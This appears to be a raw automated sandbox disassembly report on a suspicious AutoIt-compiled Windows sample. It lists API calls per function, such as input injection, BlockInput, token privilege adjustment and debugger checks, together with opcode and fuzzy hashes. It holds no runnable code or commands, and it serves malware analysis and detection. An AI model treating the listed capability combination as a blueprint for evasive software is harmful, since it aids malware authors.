                                      • Instruction Fuzzy Hash: 7E51C571A00200AFEB10AF24C886F6A7BE5AF49718F04C49DF9165F3D3D775AD418BA5
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                      • String ID:
                                      • API String ID: 292994002-0
                                      • Opcode ID: f5ade1396509eeded04edfef6886d85995725112c48288033b737163688643f2
                                      • Instruction ID: 10743eeb4addb42a4d2165cc40e4c485af376375bacd4817cc8f26cebec62498
                                      • Opcode Fuzzy Hash: f5ade1396509eeded04edfef6886d85995725112c48288033b737163688643f2
                                      • Instruction Fuzzy Hash: 9A21D8357409215FD7208F1AE884B2B7FA5FFA6314F19806CE4469B392C771EC42CB98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                      • API String ID: 0-1546025612
                                      • Opcode ID: e9d12fec5db05da9f87864c184b5ff7f6947d7b34a35373d445489ec1babcbb1
                                      • Instruction ID: 5d4ddf3c8a12e43265baf812286c22c39d21101100d7eca1651eaf342fe8b3ca
                                      • Opcode Fuzzy Hash: e9d12fec5db05da9f87864c184b5ff7f6947d7b34a35373d445489ec1babcbb1
                                      • Instruction Fuzzy Hash: 70A28F70E0021ACBDF24CF58C9507AEBBB1BF55314F2581ABD815AB385EB389D81CB59
                                      APIs
                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 004F82AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: lstrlen
                                      • String ID: ($tbU$|
                                      • API String ID: 1659193697-2723325640
                                      • Opcode ID: 61991ec9e40432dbd57cf71560c443426d366a2bc67bbf6646150837fa9c90b9
                                      • Instruction ID: a889b78a5bfc63625c7fbcb8b08fd5ebc7840f51b5d84aba8723db3fdcce92b4
                                      • Opcode Fuzzy Hash: 61991ec9e40432dbd57cf71560c443426d366a2bc67bbf6646150837fa9c90b9
                                      • Instruction Fuzzy Hash: 61325574A007099FCB28CF19C481A6AB7F0FF48710B15C46EE99ADB3A1EB74E941CB44
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0051A6AC
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0051A6BA
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                      • Process32NextW.KERNEL32(00000000,?), ref: 0051A79C
                                      • CloseHandle.KERNEL32(00000000), ref: 0051A7AB
                                        • Part of subcall function 004ACE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,004D3303,?), ref: 004ACE8A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                      • String ID:
                                      • API String ID: 1991900642-0
                                      • Opcode ID: 90254969e3a513f4cb001163bb377dfc3a668ac4e8236082d4710fe1257f0ff2
                                      • Instruction ID: 385aa273bc2e90efd0d22997839e01c5ad8946845dbcf3461feb4b87cbc8c829
                                      • Opcode Fuzzy Hash: 90254969e3a513f4cb001163bb377dfc3a668ac4e8236082d4710fe1257f0ff2
                                      • Instruction Fuzzy Hash: C7514D71508300AFD710EF25C886A6FBBE8FF99758F40492EF58597292EB34D904CB96
                                      APIs
                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 004FAAAC
                                      • SetKeyboardState.USER32(00000080), ref: 004FAAC8
                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 004FAB36
                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 004FAB88
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      • Opcode ID: 6edf632351eb18d4733d799f4d7b6dc7a4c1231dc64d6a3d385c98d3e3b09609
                                      • Instruction ID: 0328b4b491bd7858bd17e866854a8f7c39e42966daa50045666774bb0b64acde
                                      • Opcode Fuzzy Hash: 6edf632351eb18d4733d799f4d7b6dc7a4c1231dc64d6a3d385c98d3e3b09609
                                      • Instruction Fuzzy Hash: F8312CB0A4020CAEFB31CA65CC057FB7BA6AF45310F04421BE389552D1D37CA965D76B
                                      APIs
                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 0050CE89
                                      • GetLastError.KERNEL32(?,00000000), ref: 0050CEEA
                                      • SetEvent.KERNEL32(?,?,00000000), ref: 0050CEFE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ErrorEventFileInternetLastRead
                                      • String ID:
                                      • API String ID: 234945975-0
                                      • Opcode ID: 08e7b18ea25add0b2301706664297edd00778b2c4f17cbd3be2e33db2cba6f1e
                                      • Instruction ID: f12b8ad0d8dc45ea7730fdb72c3727c0d162e0cead0d212d12aee2cdac3faf67
                                      • Opcode Fuzzy Hash: 08e7b18ea25add0b2301706664297edd00778b2c4f17cbd3be2e33db2cba6f1e
                                      • Instruction Fuzzy Hash: C021DC71500705ABD731CFA5C948BAA7FFCFF52318F204A2EE646D2191E734EA099B64
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 004C271A
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004C2724
                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 004C2731
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                      • String ID:
                                      • API String ID: 3906539128-0
                                      • Opcode ID: eec12339e42e9eb67df8d10764fc45a77ede46e8d256249b012ecb72acf67f03
                                      • Instruction ID: f214e19b56410db1da69eff9f21d43b0b7b3452ac028b715dc1e7c747957100b
                                      • Opcode Fuzzy Hash: eec12339e42e9eb67df8d10764fc45a77ede46e8d256249b012ecb72acf67f03
                                      • Instruction Fuzzy Hash: 7D31F5749013189BCB21DF68DD88BDDBBB8AF18310F1045EAE81CA7261E7749F858F58
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 005051DA
                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00505238
                                      • SetErrorMode.KERNEL32(00000000), ref: 005052A1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DiskFreeSpace
                                      • String ID:
                                      • API String ID: 1682464887-0
                                      • Opcode ID: e6433ec7a6b5fe1eabf898855532b5dff9a1c9669fcef558bb33c2ed4e9874e0
                                      • Instruction ID: 0f7c1b879ffc44e319068490b8a5992c6a05973f97331d8e7259ea0cb89c7370
                                      • Opcode Fuzzy Hash: e6433ec7a6b5fe1eabf898855532b5dff9a1c9669fcef558bb33c2ed4e9874e0
                                      • Instruction Fuzzy Hash: C0317F35A00608DFDB00DF55D885EAEBFB4FF09318F048099E805AB392DB35E85ACB50
                                      APIs
                                        • Part of subcall function 004AFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 004B0668
                                        • Part of subcall function 004AFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 004B0685
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004F170D
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004F173A
                                      • GetLastError.KERNEL32 ref: 004F174A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                      • String ID:
                                      • API String ID: 577356006-0
                                      • Opcode ID: e9d4a591c0d21c39dbfceee70c684ece1061e099cad4eb63a76b730a8aabd9e7
                                      • Instruction ID: bba15c3db5ea40fb6211ab2fe553d7dd2bad4ce8c360e68ae775b82824df162e
                                      • Opcode Fuzzy Hash: e9d4a591c0d21c39dbfceee70c684ece1061e099cad4eb63a76b730a8aabd9e7
                                      • Instruction Fuzzy Hash: BD11C1B2400308EFE728EF54DC86D6FBBF9EF05714B20852EE05653251EB74BC468A64
                                      APIs
                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004FD608
                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 004FD645
                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004FD650
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CloseControlCreateDeviceFileHandle
                                      • String ID:
                                      • API String ID: 33631002-0
                                      • Opcode ID: 920343edbce51329f44480e3955c8b6928f17cfa980abfa419d1c6cd6e6a3313
                                      • Instruction ID: ab15826d29d9011a180bcaf414f3e337b20a34a84ec7a711444dc7f026013750
                                      • Opcode Fuzzy Hash: 920343edbce51329f44480e3955c8b6928f17cfa980abfa419d1c6cd6e6a3313
                                      • Instruction Fuzzy Hash: 1F11A175E01228BFEB208F94DC45FAFBFBCEB45B60F108112F904E7290C6704A058BA1
                                      APIs
                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004F168C
                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 004F16A1
                                      • FreeSid.ADVAPI32(?), ref: 004F16B1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                      • String ID:
                                      • API String ID: 3429775523-0
                                      • Opcode ID: fe7e20fff0bbf3db408df499b6339602876f855bcb61f83be81c8165a45e794a
                                      • Instruction ID: 8c36f08451b4652d8bd7eceac852d61686817e64ead0b2048b1e577dc8f5c7f5
                                      • Opcode Fuzzy Hash: fe7e20fff0bbf3db408df499b6339602876f855bcb61f83be81c8165a45e794a
                                      • Instruction Fuzzy Hash: 38F0F47195030DFBEB00DFE49C89EAEBBBCFF08644F504565E501E2191E774AA489A54
                                      APIs
                                      • GetCurrentProcess.KERNEL32(004C28E9,?,004B4CBE,004C28E9,005588B8,0000000C,004B4E15,004C28E9,00000002,00000000,?,004C28E9), ref: 004B4D09
                                      • TerminateProcess.KERNEL32(00000000,?,004B4CBE,004C28E9,005588B8,0000000C,004B4E15,004C28E9,00000002,00000000,?,004C28E9), ref: 004B4D10
                                      • ExitProcess.KERNEL32 ref: 004B4D22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: ea278e3229e48b92e5f9685d8a465490be402b96b5a6d2a27b2d721646ae8d83
                                      • Instruction ID: 9013c7b95ca7ee70e6c8aab2cd8dba166ac954fb822173ac171010ad75e0097a
                                      • Opcode Fuzzy Hash: ea278e3229e48b92e5f9685d8a465490be402b96b5a6d2a27b2d721646ae8d83
                                      • Instruction Fuzzy Hash: 64E0B631000548ABCF21AF55DD0AA993F6DEFA2795B108819FC058A223CB39DD56EB98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: /
                                      • API String ID: 0-2043925204
                                      • Opcode ID: f39f1be015005ed8c3a04619f47617c0789f935fe1343c7c3d2bc55ad2a6f180
                                      • Instruction ID: f2dcc027977c4166394ffa374813e407c3f86c7d7fc28b64e0ad9b46b3324269
                                      • Opcode Fuzzy Hash: f39f1be015005ed8c3a04619f47617c0789f935fe1343c7c3d2bc55ad2a6f180
                                      • Instruction Fuzzy Hash: 77414B7A9002186FCB249FB9DC88FBB77B8EB84314F1041AEF909C7290E6749D41CB58
                                      APIs
                                      • GetUserNameW.ADVAPI32(?,?), ref: 004ED28C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: NameUser
                                      • String ID: X64
                                      • API String ID: 2645101109-893830106
                                      • Opcode ID: eb4e12b35123dc19fddb870fd68d3fde7fa0f6ff34774208092c3e0d2bd427f9
                                      • Instruction ID: 400ca0b0e1bbe5ed0b2c14b2858140109923b73aabefed2632dcbb3935cbf35e
                                      • Opcode Fuzzy Hash: eb4e12b35123dc19fddb870fd68d3fde7fa0f6ff34774208092c3e0d2bd427f9
                                      • Instruction Fuzzy Hash: F4D0C9B4C0511DEACB90CB90DC8CDDDB77CBB15305F100192F106A2000D734954A9F10
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                      • Instruction ID: ef3a676e6c444beca476707e7e6a0c59b0928173cc19af5541818715a0c65237
                                      • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                      • Instruction Fuzzy Hash: D1022C71E002199BDF14CFA9C9C06EEBBF1EF58314F25816AD819EB384D734AA418B94
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: Variable is not of type 'Object'.$p#V
                                      • API String ID: 0-3554362348
                                      • Opcode ID: 4f683836e70b6663d7c922968dcb6e59a81f0749c100dbb77cb0cbda8e08919e
                                      • Instruction ID: 0e7f0ddac32c359fa7436d603f2f6a365984f37cb77d296ddb1e3088acd842f4
                                      • Opcode Fuzzy Hash: 4f683836e70b6663d7c922968dcb6e59a81f0749c100dbb77cb0cbda8e08919e
                                      • Instruction Fuzzy Hash: 6C32AF30900218DBDF14DF95D884AEEBBB5FF15308F10406BE816AB382D779AE46CB59
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00506918
                                      • FindClose.KERNEL32(00000000), ref: 00506961
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID:
                                      • API String ID: 2295610775-0
                                      • Opcode ID: 87d3c8b465a5c7843818af108a7b31f052c26ad90b116bd94de792d37f40e380
                                      • Instruction ID: 9a33ba4fd7933c86af47649f0ec132ab294c329b4320d7a153db630a74e3e4e0
                                      • Opcode Fuzzy Hash: 87d3c8b465a5c7843818af108a7b31f052c26ad90b116bd94de792d37f40e380
                                      • Instruction Fuzzy Hash: DB1190356042019FC710DF2AD484A1ABBE5FF85328F14C6ADF4698F6A2CB34EC05CB91
                                      APIs
                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00514891,?,?,00000035,?), ref: 005037E4
                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00514891,?,?,00000035,?), ref: 005037F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: ErrorFormatLastMessage
                                      • String ID:
                                      • API String ID: 3479602957-0
                                      • Opcode ID: 8d54995741464f911ab05a11123f4fd4ce499cb83b54bd10f7703082f4121878
                                      • Instruction ID: c01b32c971c33919d396e214cfa0fa3a5ef85f4d1a8b552130e2c6834789ce4a
                                      • Opcode Fuzzy Hash: 8d54995741464f911ab05a11123f4fd4ce499cb83b54bd10f7703082f4121878
                                      • Instruction Fuzzy Hash: C7F0EC706042146AE72057668C4DFDF3E5DEFC5765F00057AF505D22D1D9605D08C6B0
                                      APIs
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 004FB25D
                                      • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 004FB270
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: InputSendkeybd_event
                                      • String ID:
                                      • API String ID: 3536248340-0
                                      • Opcode ID: 4e833de77a3d4711b1755c121310f364bea65f145c3efc18be2c565d34a443a0
                                      • Instruction ID: f30ef02cb8219e62e96d464c2ad45b62e639e98293af9e500c1edf6c2f58d1e7
                                      • Opcode Fuzzy Hash: 4e833de77a3d4711b1755c121310f364bea65f145c3efc18be2c565d34a443a0
                                      • Instruction Fuzzy Hash: 6DF0F97190424DABDB159FA0C805BBE7FB4FF05305F14804AE955A5192C37986169F94
                                      APIs
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004F11FC), ref: 004F10D4
                                      • CloseHandle.KERNEL32(?,?,004F11FC), ref: 004F10E9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: AdjustCloseHandlePrivilegesToken
                                      • String ID:
                                      • API String ID: 81990902-0
                                      • Opcode ID: 9016ed9825cd0d4b52ccd0357080f5ab48a6a5e6743b2a8294dcb8be1f38ed8f
                                      • Instruction ID: 5a03b68ca29262f2232c50617af01d575c0268000b6ed38690f967c16989dc3c
                                      • Opcode Fuzzy Hash: 9016ed9825cd0d4b52ccd0357080f5ab48a6a5e6743b2a8294dcb8be1f38ed8f
                                      • Instruction Fuzzy Hash: 1BE04831004600EEE7351B51FC05E777BE9EF15314B10882EF55580471DB626C95DB54
                                      APIs
                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004C6766,?,?,00000008,?,?,004CFEFE,00000000), ref: 004C6998
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: ExceptionRaise
                                      • String ID:
                                      • API String ID: 3997070919-0
                                      • Opcode ID: 5a7cf0c154d946735f83cf2397c0511d52bb134559a8caa6745f920550e8ac20
                                      • Instruction ID: 06fd08c2519b70d51e50aa342cfe89490525bcb00877583d6cb7137764428339
                                      • Opcode Fuzzy Hash: 5a7cf0c154d946735f83cf2397c0511d52bb134559a8caa6745f920550e8ac20
                                      • Instruction Fuzzy Hash: BDB14A796106089FD754CF28C486B657BA0FF45364F26C65DE89ACF2A2C33AD982CB44
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3916222277
                                      • Opcode ID: 12c365ec22d0c332d0caad1039b4e046a3df13995d940bcb521cfd6e270703ed
                                      • Instruction ID: 76deb80740dc057cefebfa534c164a807b9c6f39c1abd89b05d7d91b986b3909
                                      • Opcode Fuzzy Hash: 12c365ec22d0c332d0caad1039b4e046a3df13995d940bcb521cfd6e270703ed
                                      • Instruction Fuzzy Hash: CF125E719002299BCF14CF59C8806EEB7B5FF59310F14819AE849EB256EB389E81CF95
                                      APIs
                                      • BlockInput.USER32(00000001), ref: 0050EABD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: BlockInput
                                      • String ID:
                                      • API String ID: 3456056419-0
                                      • Opcode ID: 0cada548006073006aad7502156c3432f6d03311b0844583b61960faa7b6f712
                                      • Instruction ID: 675495dcb2a936eb462c458521804d8a87ec9b5abab1d95bbd76c812c4ed07ca
                                      • Opcode Fuzzy Hash: 0cada548006073006aad7502156c3432f6d03311b0844583b61960faa7b6f712
                                      • Instruction Fuzzy Hash: EDE012312002049FC710DF5AD445D5ABBD9BF59764F10842AFC49C7291D674A8418B90
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,004B03EE), ref: 004B09DA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: b751745220646061a3da47a228b72aa69599afd51db6f97cf5b5d4f833e94cbe
                                      • Instruction ID: 86866bcd27794a9dfd992715902bb34f6de5c880d18b0b07013e54188fd83e61
                                      • Opcode Fuzzy Hash: b751745220646061a3da47a228b72aa69599afd51db6f97cf5b5d4f833e94cbe
                                      • Instruction Fuzzy Hash:
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: 0
                                      • API String ID: 0-4108050209
                                      • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                      • Instruction ID: 8cba887da43d195bb7a76150673a0dcb0a5280ef0a8845d3f340761bf95f688b
                                      • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                      • Instruction Fuzzy Hash: B85169A160C7055BEB386669889A7FF27999BD2344F18090FD882D7382C61DDE06D37E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: 0&V
                                      • API String ID: 0-2600225639
                                      • Opcode ID: 967a57cdb8f2df0cd552509ed89c5e00ba491da0c3bc93cdd5f084b68f56eedf
                                      • Instruction ID: f9371852121fedec09ed66cff0d0092aee3093fe689d44a1db6a927efef16250
                                      • Opcode Fuzzy Hash: 967a57cdb8f2df0cd552509ed89c5e00ba491da0c3bc93cdd5f084b68f56eedf
                                      • Instruction Fuzzy Hash: 2621E7326206118BD728CF79C82767E77E5B764310F148A2EE4A7C33D0DE79A904DB80
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f1d4d5fe28b2b6c98a95565bb733d8dc5c73cfecb772b050c7a7ed3be1f28674
                                      • Instruction ID: 8a798d9d6091e077ddfc1757d0bb7bad86cb84fe4389be14ad2ccac492b5288c
                                      • Opcode Fuzzy Hash: f1d4d5fe28b2b6c98a95565bb733d8dc5c73cfecb772b050c7a7ed3be1f28674
                                      • Instruction Fuzzy Hash: 1F325236D29F014ED7639634D822336A64CAFB73C5F14D73BE81AB5EA6EB28C4835504
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 02e835a1fffff1885316a6049469f4ec63b7682f77f2484633ecc56fa9a7434f
                                      • Instruction ID: 0b6bdf019057083410872b657de7990fbdc28e03c78903cb030cd28e7ce7eb18
                                      • Opcode Fuzzy Hash: 02e835a1fffff1885316a6049469f4ec63b7682f77f2484633ecc56fa9a7434f
                                      • Instruction Fuzzy Hash: 77322832A041958FDF28CF2AC4D067E77A1EB46312F28856BD4998B391D23CDD83DB49
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5781820a078c2dc24ff641843ccac11cf50ff3b3b78b1a05ce3ee7cd2805a45b
                                      • Instruction ID: 5844f1b7e8f9fa260f2715c3fb2f52439ecb23fa6690c2d51f5fdbbdb66ebeca
                                      • Opcode Fuzzy Hash: 5781820a078c2dc24ff641843ccac11cf50ff3b3b78b1a05ce3ee7cd2805a45b
                                      • Instruction Fuzzy Hash: 2522BDB0A006099FDF14CFA9D891AAEB7B1FF44304F10452BE816A7391EB39ED15CB59
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c8d98cd2b4b53beecfc5c64c389331bdafb5ab131023b47ab9c371b7c0681c69
                                      • Instruction ID: 12fe589504b6075cc802ab3f743480db3d76b15fa1e6a31b755a5c61d8a0fceb
                                      • Opcode Fuzzy Hash: c8d98cd2b4b53beecfc5c64c389331bdafb5ab131023b47ab9c371b7c0681c69
                                      • Instruction Fuzzy Hash: 6102E9B0A00205EBDF04DF55D851AAEBBB1FF54304F11856BE8069B390E739ED15CB99
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 236731db7fa9ce81f04f2f49ce4d4a465c5e02391f7bd7b9b6e843873a08ee29
                                      • Instruction ID: 6735b4ae8f31832a1e797706e4dce5ef06318510bd954dd029caa6b7ab7eb187
                                      • Opcode Fuzzy Hash: 236731db7fa9ce81f04f2f49ce4d4a465c5e02391f7bd7b9b6e843873a08ee29
                                      • Instruction Fuzzy Hash: A061256120C70566DA7499288895BFF3398DFD5708F14091FE942DB382D51DAE42CB3E
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 00512B30
                                      • DeleteObject.GDI32(00000000), ref: 00512B43
                                      • DestroyWindow.USER32 ref: 00512B52
                                      • GetDesktopWindow.USER32 ref: 00512B6D
                                      • GetWindowRect.USER32(00000000), ref: 00512B74
                                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00512CA3
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00512CB1
                                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00512CF8
